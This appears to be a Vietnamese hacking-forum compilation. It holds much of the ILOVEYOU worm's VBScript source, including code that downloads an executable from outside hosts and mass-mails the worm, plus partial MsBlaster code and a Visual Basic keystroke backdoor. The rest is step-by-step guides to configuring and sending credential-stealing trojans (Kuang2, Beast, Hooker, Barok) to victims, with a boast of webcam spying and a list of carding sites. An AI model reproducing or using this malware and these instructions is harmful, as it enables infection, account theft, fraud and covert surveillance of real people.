"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32

",dirsystem&"\MSKernel32.vbs"

regcreate

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi

n32DLL",dirwin&"\Win32DLL.vbs"

downread=""

downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet

Explorer\Download Directory")

if (downread="") then

downread="c:\"

end if

if (fileexist(dirsystem&"\WinFAT32.exe")=1) then

Randomize

num = Int((4 * Rnd) + 1)

if num = 1 then

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj

w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"

elseif num = 2 then

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe

546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"

elseif num = 3 then

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm

POhfgER67b3Vbvg/WIN-BUGSFIX.exe"

elseif num = 4 then

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh

YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX

.exe"

end if

end if

if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then

regcreate

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI

X",downread&"\WIN-BUGSFIX.exe"

regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Start

Page","about:blank"

end if

end sub

sub listadriv

On Error Resume Next

Dim d,dc,s

Set dc = fso.Drives

For Each d in dc

If d.DriveType = 2 or d.DriveType=3 Then

folderlist(d.path&"\")

end if

Next

listadriv = s

end sub

sub infectfiles(folderspec)

On Error Resume Next

dim f,f1,fc,ext,ap,mircfname,s,bname,mp3

set f = fso.GetFolder(folderspec)

set fc = f.Files

for each f1 in fc

ext=fso.GetExtensionName(f1.path)

ext=lcase(ext)

s=lcase(f1.name)

if (ext="vbs") or (ext="vbe") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or
(ext="sct")

or (ext="hta") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

bname=fso.GetBaseName(f1.path)

set cop=fso.GetFile(f1.path)

cop.copy(folderspec&"\"&bname&".vbs")

fso.DeleteFile(f1.path)

elseif(ext="jpg") or (ext="jpeg") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

set cop=fso.GetFile(f1.path)

cop.copy(f1.path&".vbs")

fso.DeleteFile(f1.path)

elseif(ext="mp3") or (ext="mp2") then

set mp3=fso.CreateTextFile(f1.path&".vbs")

mp3.write vbscopy

mp3.close

set att=fso.GetFile(f1.path)

att.attributes=att.attributes+2

end if

if (eq<>folderspec) then

if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or

(s="script.ini") or (s="mirc.hlp") then

set scriptini=fso.CreateTextFile(folderspec&"\script.ini")

scriptini.WriteLine "[script]"

scriptini.WriteLine ";mIRC Script"

scriptini.WriteLine "; Please dont edit this script... mIRC will
corrupt,

if mIRC will"

scriptini.WriteLine " corrupt... WINDOWS will affect and will not run

correctly. thanks"

scriptini.WriteLine ";"

scriptini.WriteLine ";Khaled Mardam-Bey"

scriptini.WriteLine ";http://www.mirc.com"

scriptini.WriteLine ";"

scriptini.WriteLine "n0=on 1:JOIN:#:{"

scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"

scriptini.WriteLine "n2= /.dcc send $nick

"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"

scriptini.WriteLine "n3=}"

scriptini.close

eq=folderspec

end if

end if

next

end sub

sub folderlist(folderspec)

On Error Resume Next

dim f,f1,sf

set f = fso.GetFolder(folderspec)

set sf = f.SubFolders

for each f1 in sf

infectfiles(f1.path)

folderlist(f1.path)

next

end sub

sub regcreate(regkey,regvalue)

Set regedit = CreateObject("WScript.Shell")

regedit.RegWrite regkey,regvalue

end sub

function regget(value)

Set regedit = CreateObject("WScript.Shell")

regget=regedit.RegRead(value)

end function

function fileexist(filespec)

On Error Resume Next

dim msg

if (fso.FileExists(filespec)) Then

msg = 0

else

msg = 1

end if

fileexist = msg

end function

function folderexist(folderspec)

On Error Resume Next

dim msg

if (fso.GetFolderExists(folderspec)) then

msg = 0

else

msg = 1

end if

fileexist = msg

end function

sub spreadtoemail()

On Error Resume Next

dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad

set regedit=CreateObject("WScript.Shell")

set out=WScript.CreateObject("Outlook.Application")

set mapi=out.GetNameSpace("MAPI")

for ctrlists=1 to mapi.AddressLists.Count

set a=mapi.AddressLists(ctrlists)

x=1

regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)

if (regv="") then

regv=1

end if

if (int(a.AddressEntries.Count)>int(regv)) then

for ctrentries=1 to a.AddressEntries.Count

malead=a.AddressEntries(x)

regad=""

regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)

if (regad="") then

set male=out.CreateItem(0)

male.Recipients.Add(malead)

male.Subject = "ILOVEYOU"

male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from
me."

male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

male.Send

regedit.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"

end if

x=x+1

next

regedit.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count

else

regedit.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count

end if

next

Set out=Nothing

Set mapi=Nothing

end sub

sub html

On Error Resume Next

dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6

dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META

NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _

"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? isp...@mail.com ?-?

@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf&
_

"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is

good...@-@>"&vbcrlf& _

"<?-?HEAD><BODY

ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#

-#,#-#main#-#)@-@ "&vbcrlf& _

"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#

-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@
BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _

"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to
read

this HTML file<BR>- Please press #-#YES#-# button to Enable

ActiveX<?-?p>"&vbcrlf& _

"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@

BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>

"&vbcrlf& _

"<?-?BODY><?-?HTML>"&vbcrlf& _

"<script language=@-@JScript@-@>"&vbcrlf& _

"<!--?-??-?"&vbcrlf& _

"if (window.screen){var wi=screen.availWidth;var

hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf&
_

"?-??-?-->"&vbcrlf& _

"<?-?SCRIPT>"&vbcrlf& _

"<script LANGUAGE=@-@VBScript@-@>"&vbcrlf& _

"<!--"&vbcrlf& _

"on error resume next"&vbcrlf& _

"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _

"aw=1"&vbcrlf& _

"code="

dta2="set fso=CreateObject(@-...@Scripting.FileSystemObject@-@)"&vbcrlf& _

"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _

"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _

"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _

"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _

"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf&
_

"wri.write code4"&vbcrlf& _

"wri.close"&vbcrlf& _

"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _

"if (err.number=424) then"&vbcrlf& _

"aw=0"&vbcrlf& _

"end if"&vbcrlf& _

"if (aw=1) then"&vbcrlf& _

"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _

"window.close"&vbcrlf& _

"end if"&vbcrlf& _

"end if"&vbcrlf& _

"Set regedit = CreateObject(@-...@WScript.Shell@-@)"&vbcrlf& _

"regedit.RegWrite

@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru

n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _

"?-??-?-->"&vbcrlf& _

"<?-?SCRIPT>"

dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")

dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")

dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")

dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")

dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")

dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")

dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")

dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")

set fso=CreateObject("Scripting.FileSystemObject")

set c=fso.OpenTextFile(WScript.ScriptFullName,1)

lines=Split(c.ReadAll,vbcrlf)

l1=ubound(lines)

for n=0 to ubound(lines)

lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))

if (l1=n) then

lines(n)=chr(34)+lines(n)+chr(34)

else

lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"

end if

next

set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")

b.close

set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)

d.write dt5

d.write join(lines,vbcrlf)

d.write vbcrlf

d.write dt6

d.close

end sub

<!--[endif]--> Mã nguồn của MsBlaster Virus

MsBlaster , lọai virus đã từng nổi tiếng 1 thời gần đây
( và có thể sẽ tiếp tục trong tương lai ) . Qua con
đường Internet , MsBlaster phán tán vào những máy cài
Windows XP chưa có bản vá cho phần RPC trong hệ thống. Trong
bản version đầu tiên của MsBlaster thì thiệt hại xảy ra
chưa nghiêm trọng lắm . Chỉ đơn giản là máy bạn động
nhiên hiện 1 thông báo nói rằng sẽ tự động tắt máy
sau 60 giây. Tình trạng này xảy ra theo chu kỳ mỗi lần
bạn kết nối vào Internet. Để biết cách phòng chống và
giải pháp tạm thời đối với lọai virus này , bạn hãy
tham khảo bài Diệt MsBlaster virus – Tắt máy sau 60 giây
trong phần Virus-Trojan. Còn bây giờ , nếu bạn là 1 nhà
lập trình giỏi , hãy tham khảo qua chủ đề chính của
bài viết này – mã nguồn của MsBlaster virus :

/* global variables*/char Filename[SOME_CONST];DWORD i_ip_A;DWORD
i_ip_B;DWORD i_ip_C;DWORD i_ip_D;DWORD i_ip_D_?;/* Deliberately left
blank. This function listens on ports 69 and 135 for incoming
connections. It then tries to spread itself. It might have spread
faster had it done a progressive network scan.*/void spreadworm(){}/*
Deliberately left blank. Was designed to do a DoS attack on
windowsupdate.com. The MS Windows Update system is flawed in this
respect, there should be mirror update sites maintained around the
world rather than the current cluster of servers in one location
with one IP address. The worm might have been better off attacking
windowsupdate.microsoft.com or microsoft.com for real entertainment
value.*/SEC_THREAD_START payload(){}// mainint main(){ in_addr in;
DWORD temp_ip_buf; hostent _hostent; char local_ip_address[0x200],
month[3], day_of_month[3]; LPWSADATA WSAData; HKEY hKey; DWORD
ThreadId; bool status; /* Registry Key manipulation. We
create the key if it doesn't exist, otherwise it is opened. Then
we give the value "msblast.exe" to the key "windows auto update".
Windows Auto Update is now set to run on boot up, which will run
MSBlast.exe. */ RegCreateKeyExA(0x80000002,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
0, 0, 0, 0xf003f, 0, & hKey, 0); RegSetValueExA(hKey, "windows
auto update", 0, 1, "msblast.exe", 0x32); RegCloseKey(hKey); /*
Check to see if an instance of MSBlast.exe is already running, if
there is one running then this instance exits. */ CreateMutexA(0,
1, "BILLY"); if (GetLastError() == 0xb7) ExitProcess(0); if
((WSAStartup(0x202, & WSAData) != 0) || (WSAStartup(0x101, &
WSAData) != 0) || (WSAStartup(0x001, & WSAData) != 0))
return -1; /* We need to know where MSBlast.exe is located so
that we can redistribute it. */ GetModuleFileNameA(0,
&Filename, 0x104); /* Idle Event. We wait for a connection
to the internet to be established before we can proceed. */
while (InternetGetConnectedState(& ThreadId, 0) == 0) Sleep(0x4e20);
/* Generate Random IP Address */ i_ip_D = 0;
srand(GetTickCount()); randomip_A = rand() % 0xFE; randomip_A++;
randomip_B = rand() % 0xFE; /* Get Host Machine IP */ if
(gethostname(& local_ip_address, 0x200) != ffffffff) { _hostent
= gethostbyname(& local_ip_address); if (_hostent != 0) {
if (_hostent.hlength != 0) { memcpy( &in,
&_hostent.hlength, 4); sprintf(&local_ip_address, "%s",
inet_ntoa(in.S_un)); temp_ip_buf = strtok(&local_ip_address,
"."); /* Split ip address into A.B.C.(D).
*/ i_ip_A = atoi(temp_ip_buf); temp_ip_buf = strtok(0,
"."); i_ip_B = atoi(temp_ip_buf); temp_ip_buf =
strtok(0, "."); i_ip_C = atoi(temp_ip_buf); if (i_ip_C
> 0x14) { srand(GetTickCount()); i_ip_C -= rand() % 0x14; } /* Don't use Random IP Addresses. */ randomip_A = i_ip_A; randomip_B = i_ip_B; status = true; } } } srand(GetTickCount()); if ((rand() % 0x14) < 12) status = 0; i_ip_D_? = 1; if ((rand % 0xA) > 7) i_ip_D_? = 2; if (status == 0) { i_ip_A = rand() % 0xFE; i_ip_A++; i_ip_B = rand() % 0xFE; i_ip_C = rand() % 0xFE; } /* Get Date. */ GetDateFormatA(0x409, 0, 0, &"d", &day_of_month, 3); GetDateFormatA(0x409, 0, 0, &"M", &month, 3); /* Payload. Run payload() if the date is right ??? */ if ( (atoi(& day_of_month) > 15) || (atoi(& month) > 8) ) CreateThread(0, 0, payload, 0, 0, &ThreadId); /* Spreadworm. */ while (1) spreadworm(); /* Sense of Humour. The remainder of the code will never get executed. */ WSACleanup(); return 0;}

Trojan duoc viet bang vb

Trong bài viết này , tui sẽ giới thiệu với bạn 1 đọan
mã nhỏ để tạo trojan đơn giản bằng Visual Basic. Trojan
này chỉ mới có khả năng hiện những chữ máy chủ đang
đánh lên màn hình của máy nạn nhân – nghĩa là bạn
nhấn phím gì trên máy mình thì máy nạn nhân cũng vậy.

Bắt đầu bạn tạo 1 form mới. Bạn thêm vào WinSock Control
( Ctrl + T ). Kế đến bạn sao chép tòan bộ mã sau vào trong
phần code

`Biến cố khởi động chương trình

Private Sub Form_Load()

'Không hiện chương trình trong Task Manager

App.TaskVisible = False

'Đưa Trojan vào phần khởi động trong Registry

Dim Reg As Object

Set Reg = CreateObject("wscript.shell")

Reg.RegWrite
"HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSERVICES\"
& App.EXEName, App.Path & "\" & App.EXEName & ".exe"

'Số cổng mà ta sẽ dùng để kết nối từ máy khác khi
Trojan đang chạy

winsock1.localport = "666"

'Thiết lập cho Trojan luôn đợi kết nối vào Internet

winsock1.Listen

End Sub

============================

Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)

'Kiểm tra Winsock để chắc chắn không 1 chương trình nào
đang dùng nó

If Winsock1.State <> sckClosed Then Winsock1.Close

Winsock1.Accept requestID 'Chấp nhận liên kết chỉ với
người vào đúng cổng

============================

Private Sub Winsock1_Error(ByVal Number As Integer, Description As
String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As
String, ByVal HelpContext As Long, CancelDisplay As Boolean)

'Nếu kết nối bị rớt , thiết lập cho winsock lập lại
việc chờ đợi kết nối

Winsock1.Close

Winsock1.Listen

End Sub

============================

Private Sub Winsock1_Close()

'Giống như trên

Winsock1.Close

Winsock1.Listen

End Sub

============================

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)

Dim data1 As String 'Thiết lập giá trị để lưu trữ dữ
liệu

Winsock1.GetData data1 'Lấy thông tin từ phần điều khiển
và lưu nó trong data1

DoEvents

SendKeys data1 'Đùa chút với nạn nhân bằng cách -Mình
đánh gì-Máy victim hiện chữ đó-

End Sub

Cach dung trojan

Hướng dẫn cách sử dụng Kuang 2 :

Kuang 2 là Trojan tuyệt vời chuyên dùng để ăn cắp Account
như account Internet và account mail. Vì vậy nó có thể
được coi là công cụ trợ lực cho Hacker chúng ta. Tuy
nhiên nhiều người Download nó về mà không biết xài hoặc
khi gửi cho victim (nạn nhân) thì gặp trục trặc. Vì vậy
hôm nay tôi sẽ hướng dẫn các bạn các sử dụng Trojan
Kuang 2
1. Download và Unzip file nén
2. Double click vào file K2pS_setup
3. Một cửa sổ nhỏ xuất hiện :
- Psender file: click vào open và chọn file: K2pS_full.exe
- SMTP server: mail.yahoo.com or mail.hotmail.com (tùy thuộc vào
địa chỉ email của các bác)
- Destination address: address của các bạn ở yahoo hoặc
hotmail (nếu account là hotmail thì SMTP server sẽ là :
mail.hotmail.com) (cũng không cần ! Các bạn có thể viết là
Mail.vnn.vn )
4. Source address: đừng động gì tới nó …leave it as it is.
5. Save lại và nhớ đổi tên con Kuang 2 này nhé (bất cứ
tên gì thật hấp dẫn để dụ victim phải open nó)
6. Compose một email rồi attached con Kuang 2 này vào rồi gửi
đến victim. Hotmail nhận dạng được K2 nhưng Yahoo thì
không.
Simple, as soon as victim active attached file, Kuang2 sẽ gửi về
account của các bạn 1 email thông báo về user name, password
và IP
File Readme của Kuang2 hơi bị phức tạp, new user dễ bị
nhầm lẫn cái phần SMTP server và Destination address lắm.
Moreover, tác giả của Kuang2 claim là Kuang2 có thể hack
được password của yahoo và hotmail, but in fact…it‘s unable
to do so!!! (bad news eh!!!) Kuang2 chỉ có thể steal password
của window Connect to thôi, nếu victim dùng cable thì Kuang2
cũng chào thua.

Tiếp theo tôi sẽ hướng dẫn các bạn sử dụng Trojan
Kuang2loggeras, đây là một thể biến dạng của Kuang2 :

Ðể lấy password của Yahoo, Hotmail và cả Dial-up thì có
nhiều biện pháp nhưng khả quan hơn cả là password e-mail
cóthể lấy được dễ dàng bằng cách dùng Trojan đó là
con Kuang LoggerAs. Trước hết xin giới thiệu con này có
chức năng lấy password Dial-Up của Victim và có kèm theo cả
chức năng Keylog tức nó sẽ thu gom tất cả các phím
được gõ trên bàn phím khi nó thường trú trong bộ nhớ,
tất cả được tổng hợp trong một con Trojan có kích
thước rất bé và không chiếm nhiều bộ nhớ khi nó nằm
thường trú nên không gây nghi ngờ, ngay cả khi bấm
Ctrl+Alt+Del cũng không thấy nó nốt. Sau đó nó sẽ gởi
Report về E-mail đã được định trước. Do không rõ
nguồn gốc nên mình không thể cung cấp chính xác nơi để
các bác download về mà dùng nên các bác phải dùng Google
hoặc phiên bản mới cũng thuộc loại mạnh là Wisenut gõ
vào:
"Kuang2loggeras.zip" và sẽ download được con này về. Sau đó
chạy K2las_su.exe chọn Open chọn file Virus chính là
K2logas.exe và nhấp chuột vào Open.
Sau đó các bác cung cấp SMTP của dịch vụ E-mail mà bác
đang dùng có thể dùng pmail.vnn.vn sau đó sang Destination
address cho biết địa chỉ sẽ nhận Report còn phần Source
address thì để nguyên. Ở phần bên phải là cấu hình cho
con này phần này có thể xem thêm trong Readme.txt kèm theo
Virus. Trong đó phần quan trọng là Send every..X..
days "x" ở đây là số ngày cách nhau mà nó sẽ gởi Report
về cho các bác. Sau đó chọn "Save" là xem như phần cấu
hình xong xuôi. Lúc này chỉ cần đem file "k2logas.exe" đi cho
lây là xong. Có thể gởi trực tiếp qua e-mail hoặc đem
đến các dịch cụ cho thuê mà chủ động chạy nó trên
bất kỳ máy nào. Theo tôi thì các bác hãy đem đến dịch
vụ cho lây sau khoảng nữa ngày đến 2 ngày sau, nếu bạn
sử dụng Windows win98,95,win98se... thì hãy đến đúng máy
đó mà vào Windows\System copy lại file "K2logas.cfg" còn nếu
sử dụng Windows 2000, XP thì vào thư mục system32 rồi copy
file "K2logas.cfg" (nếu ở các hệ điều hành khác thì bạn
hảy dùng chức năng Search của Windows).đây chính là phần
data mà nó log lại được. Sau đó sẽ có một đống pass
do người ta đến đây chủ yếu là Checkmail. Vì sao phải
tự đến lấy mà không phải đợi nó send về lý do là
các phòng máy đa số nối mạng Lan và dùng Proxy để chia
sẽ mạng mà con này lại được thiết kế để send dữ
liệu trên máy có gắn modem và khi quay số vào mạng cụ
thể như máy cái của các phòng máy này. Sau khi đã lấy
được file dữ liệu của nó rồi thì còn phải tách
username và mật mã ra do nó không đủ thông minh để tự
tách cái này ra nhưng chỉ cần xem qua là biết đâu là
tên, đâu là mật mã rồi. Các bác có thể Test thử nó
trên máy của mình trước khi dùng thực tế, sau đó chỉ
cần vào Registry xoá bỏ phần AutoStart của nó trong khoá
Run là xong

Hướng dẫn sử dụng Trojan Hooker :

Bước 1 : Bạn load con trojan Hooker về , rồi giải nén nó :
Nó sẽ gồm các file sau :
Config.bat ;

history.txt ;

hkconf.exe ;

hooker.exe ;

Hkconf.ini ;

Bước 2 : Bạn chạy file Hkconf.ini : bạn thay đổi các
thông số của file này :

- host = mail.vnn.vn

-mailto=địa chỉ email của bạn (nơi mà trojan gửi account
về)

reg_desc = TaskMem
exename = MSCR56.exe
Ở dòng cuối cùng của file này bạn thêm một dòng sau
s13=logon

Bước 3 : Sau khi thay đổi xong bạn save lại ! rồi chạy
file Config.bat !!!

Bước 4: Sau khi thực hiện xong 3 bước trên bạn gửi file
Hooker.exe cho victim (người muốn lấy Account) !

Bước 5 : Bạn chỉ việc ngồi chờ sao cho victim mở file
của bạn gửi ! Thế là acc đã thuộc vệ

Lại một loại trojan mới nữa được ra đời tên nó là
Beast 2.00 , nghe nói là có thể qua mặt được cả yahoo ,
hotmail , trùi ui nghe có vẻ đáng sợ quá đi mất , vậy
công dụng của nó là để làm gì nhỉ , cũng chẳng to tác
gì lắm ngoài mấy cái công việc cũ kĩ là điều khiển
máy tính nạn nhân , lấy pass và một số trò thú vị nữa
. Đầu tiên thì phải : Download , nó cái đã nhỉ ... tiến
hành giải nén rồi chạy File Beast 2.00.
Sẽ có một giao diện hiện ra . Bây giờ trước tiên ta
cần tạo ra File Trojan để gửi đi . Nhắp vô nút Build
Server ( hình minh hoạ )

+) Phần Basic Setting:
Name : Đặt tên file mà bạn thích ; Nên đặt tên file có
vẻ Microsoft . Vd Systems.dll
Port : để mặc định là 6666 ( Cổng sẽ mở khi Trojan
hoạt động bạn có thể thay đổi cũng được)
Password : Gõ vô 1 pass mà bạn thích để đảm bào chi có
mình bạn quậy victim này.


1-Qua ICQ. Bạn gõ vào mục ICQ UNI số ICQ của bạn để
backdoor gửi message báo cho bạn mỗi khi victim online. Tôi gõ
số ICQ của tôi là 10469000 vô. để cho chắc ăn bạn nên
kiểm tra lại bằng cách nhắp vô nút Test. Nếu có 1 message
về cho bạn là được rồi đó. Các bạn nhớ đánh dấu
vào mục chọn Enable ICQ nhé như vậy mỗi khi online Victim
sẽ gửi về cho ban 1 mesage ICQ trong đó có ip , pass và uesr
của victim..


+) Phần Av_KW killing: Nếu bạn muốn Backdoor này Kill tất
cả các trường trình diệt virut trên máy victimthì hãy
nhắp vô mục chọn Kill Av- Kw killng on star. Bạn có thể
bổ xung thêm tên các chuương trình khác nữa mà bạn muốn
diệt = cách nhắp vào nút Configure.

+)Miscellaneous: Bạn nên để mặc định. Như vậy khi
backdoor đượckich hoạt chạy . Thì nó sẽ lặng lẽ hành
động và tự xóa dấu vết. Nếu bạn không muốn nó tự
xóa thì có thể bỏ mục chọn Melt server on install.

+)Exe icon; Bạn chon 1 loại icon mà bạn muốn Ok
Bây giờ bạn hãy nhắp nút Save server. Và 1 file co tên là
server sẽ được tạo ra. Kick thước khoảng 70 k bạn có
thể gửi đi mà không sợ bị phát hiện hoặc đinh kèm vô
1 cái ảnh nào đó. dụ cho victim mở ra là OK

Sau khi victim mở file thì sẽ có 1 message gửi = ICQ đến cho
ta bạn hãy dung Ip+ Port+ Pass để nhấp vô bảng điều
khiển khi chạy file Beast2.00 .exe nha nhắp nút Go beast để
kết nối tới Victim. Sau khi kết nối hoàn tất bạn có
thể điều khiển victim rồi đó. Các trò xóa , upload ,
rename , delete file , dấu chuột , start bar ... như con Net
devil, Sup7 ok.

Có một lần khi vào dịch vụ NET mình thấy có một cô
gái, người ngoại quốc rất xinh đẹp, chạy về nhà
liền dùng thử chương trình này, thấy cũng hiệu nghiệm
lắm, mới biết toàn bộ infomation của cô gái đó, ngay
cả việc mở webcam, cô ta cũng hông hay biết ( he he he ),
nếu bạn biết kết hợp thêm nhiều chức năng, và các
chương trình khác, thì đây cũng là Tool hiệu quả cho
newbie.

Hướng dẫn sử dụng Barok

Bước 1 : Download con Barok về rồi giải nén ( tìm trong
google.com )

Bước 2 : Chạy file Client.exe

Bước 3 : click vào openserver --> chọn file barok.exe -->open

Bước 4 : ở mục
+ File name : tên file Barok.exe ( hoặc bất kỳ File nào khác )

+ Outgoing Mail server (SMTP) :
Mail.vnn.vn
+ your mail address : địa chỉ email của bạn
+ trong mục Schedule Send : * every online ( bạn đánh dấu mục
na`y thì trojan sẽ gửi account về cho bạn hàng ngày )
* Every ( bạn tùy chọn số ngày trojan gửi account về )

Bước 5 : sau khi điền đầy đủ như tręn bạn click vào
save server ! Bây giờ bạn đổi tên file Barok.exe này thành
tên 1 chương trình gi gì đó rồi gửi cho victim ! và chờ
cho victim mở File này ra là OK

Bước 1 : download con Barrio về và giải nén ! ( các bạn
tìm trong google.com )

Bước 2 : chạy file btrcfg.exe :
Ta thấy hiện lên một cửa sổ nhỏ --> click vào next -->ta
thấy một khung nhỏ, ở đây bạn hãy đánh email của mình
vào khung này --> click vào add -->click vào next.


Ta lại thấy một khung nhỏ SMTP hiện lên !Bạn hãy đánh
Mail.vnn.vn --> click vào next --> click vào next lần nữa -->ta
lại thấy một khung nhỏ nữa ! Ðây chính là chỗ mà ta
đánh vào tên file cần lấy (vd: muốn lấy account thì bạn
đánh vào *.pwl ) bạn có thể lấy bao nhiêu file trên máy
victim tuỳ ý --> bạn click vào next tiếp --> lại click vào
next -->cứ click liên tục đến lúc nó hiện ra một khung
có chữ trojan.exe. lúc này bạn chọn đường dẫn đến
một file trojan.exe khác (như hooker.exe ) hoặc một file.exe
của window ( hay hơn bạn lấy file diệt virus BKAV.exe để
lừa victim ) --> next -->next-->kết thúc !!


Bước 3 : Sau khi làm các bước trên bạn đã tạo ra 1 file
.exe ;Bạn gửi file này cho victim ! Khi Victim mở ra thì trojan
sẽ lấy tất các file mà bạn yêu cầu gửi về cho bạn
qua email !! ( *.pwl là file của account ! bạn sử dụng
chương trình giải mã file pwl sẽ lấy usename ; pass ; phone ;
ip )

dia chi tim kiem duoc CC.
http://www.ccmonster.com
http://www.thetindung.ws
http://www.hoctroviet.com
http://www.freetindung.net
http://thamtukinhcan.web.aplus.net/diendan
http://hacked.at/acc-update
http://invisionfree.com/forums/hangmienphi
http://www.beconxinh.com
http://vietbac.tk
http://www.dianguc.com
http://www.mathuat.com
http://hai-dang.com
http://tintac.us
http://hack-accvn.com
http://accvn.net.tc
http://www.thichdua.sg.st
http://hacked.at/ac
http://hacked.at/quynhtrang
http://boythoidai.com/accchuavn/phpBB2/clbhacker.com
http://vietbac.dk3.com
http://hackerhn.com
http://traitimmuathu.good.to
http://invisionfree.com/forums/hackervn
http://vnhker.com/forum
http://thamtukinhcan.web.aplus.net/diendan/;
http://hacked.at/acc-update;
http://invisionfree.com/forums/hangmienphi;

http://www.beconxinh.com/;
http://vietbac.tk;
http://www.dianguc.com
http://www.mathuat.com/
http://hai-dang.com/
http://tintac.us
http://hack-accvn.com/
http://accvn.net.tc/
http://www.thichdua.sg.st
http://hacked.at/ac
http://hacked.at/quynhtrang
http://hacked.at/acc-update
http://boythoidai.com/accchuavn/phpBB2/
http://clbhacker.com
http://vietbac.dk3.com
http://vietbac.tk
http://hackerhn.com
http://traitimmuathu.good.to
http://invisionfree.com/forums/hackervn
http://vnhker.com/forum
http://tintac.us

Sau khi bạn download con magic 1.5 về rồi giải nén...và bạn
bấm vào setup xuất hiện một khung :

Victim : tùy chọn send pass,IP,OS hoặc send tất cả ...
enable fake error mesage lên .

Fake Error Message : Điền gì cũng được, càng giống error
của win càng tốt
Your Yahoo ! ID : Ở ô Y ! ID bạn điền vào đó nick của
bạn ở yahoo ( nick không có đuôi @yahoo.com )
MPS creator: có thể để nguyên hoặc chọn JPG incon để nó
hiển thị với một file ảnh cho dễ dụ victim,change name
